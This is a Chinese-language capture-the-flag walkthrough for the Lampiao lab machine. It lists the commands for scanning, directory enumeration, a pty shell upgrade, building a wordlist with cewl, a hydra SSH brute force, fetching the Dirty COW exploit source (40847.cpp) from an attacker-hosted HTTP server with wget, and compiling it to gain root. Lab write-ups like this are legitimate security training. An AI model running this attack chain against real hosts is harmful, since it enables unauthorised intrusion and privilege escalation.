Lampiao靶场-dirtycow漏洞利用

Lampiao靶场-dirtycow漏洞利用

只是简单记录一下所用工具

靶机信息:

靶机:192.168.142.132

攻击机:192.168.142.133

一、主机发现

nmap -sP 192.168.142.0/24

需要自己判断一下,哪台是靶机。

二、端口扫描

nmap -A -p- 192.168.142.132

进行端口扫描,获取端口信息,发现有22、80、1898端口开放

三、目录遍历

目录遍历可以使用dirb或者dirsearch工具

dirb http://192.168.142.133:1898

python3 dirsearch.py -u http://192.168.142.133:1898

个人感觉dirsearch比较速度更快

四、拿到webshell

这里就不写了,网上太多了。

五、实现交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

其他方式参考大佬的文章,发现好东西就分享,我就不复制粘贴了。

https://saucer-man.com/information_security/233.html

六、暴力破解

因为有22端口,存在爆破的可能性,先收集一下网站信息做一个字典

cewl http://192.168.142.133:1898 -w lampiao.txt

用hydra进行ssh的暴力破解

hydra -l tiago -P lampiao.txt 192.168.142.133 ssh

补充:

-l后面加用户名,拿到交互式shell后可以查询一下/etc/passwd文件,自然可以拿到用户名。前期是拿不到其他用户名的,发现22端口开放也只能爆破root。

如果直接爆破root成功,恭喜你游戏结束。

七、把dirtycow脚本传到靶机

1、用python开启http服务

在攻击机上用python开启一个端口为3333的http服务

python -m http.server 3333

靶机用wget下载dirtycow脚本,当然有一些细节,需要自己去思考。

wget http://192.168.142.133:3333/40847.cpp

2、ssh服务传输文件

参考资料:

https://zhuanlan.zhihu.com/p/507876254

攻击机上运行:

rsync 40847.cpp [email protected]:/home/tiago

或者

靶机上运行:

rsync [email protected]:/root/桌面/40847.cpp .(.是代表当前路径)

八、编译运行dirtycow脚本

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

  1. -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
  2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
  3. -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
  4. -std=c++11就是用按C++2011标准来编译的
  5. -pthread 在Linux中要用到多线程时,需要链接pthread库
  6. -o dcow gcc生成的目标文件,名字为dcow

参考资料:

https://blog.csdn.net/weixin_43715506/article/details/113410027

https://blog.csdn.net/qq_42967398/article/details/102536576

热门相关:最强狂兵   刺客之王   薄先生,情不由己   时间都知道   天启预报